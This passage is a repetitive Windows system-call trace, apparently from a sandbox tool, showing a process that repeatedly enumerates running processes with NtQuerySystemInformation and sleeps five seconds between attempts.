ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.540] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.551] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.568] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.585] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.598] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.614] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.629] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.645] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.661] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.676] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.692] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.707] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.728] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.741] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.754] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.771] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.787] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.801] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.817] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.832] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0126.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0126.848] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0126.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0126.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0126.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0126.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0126.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 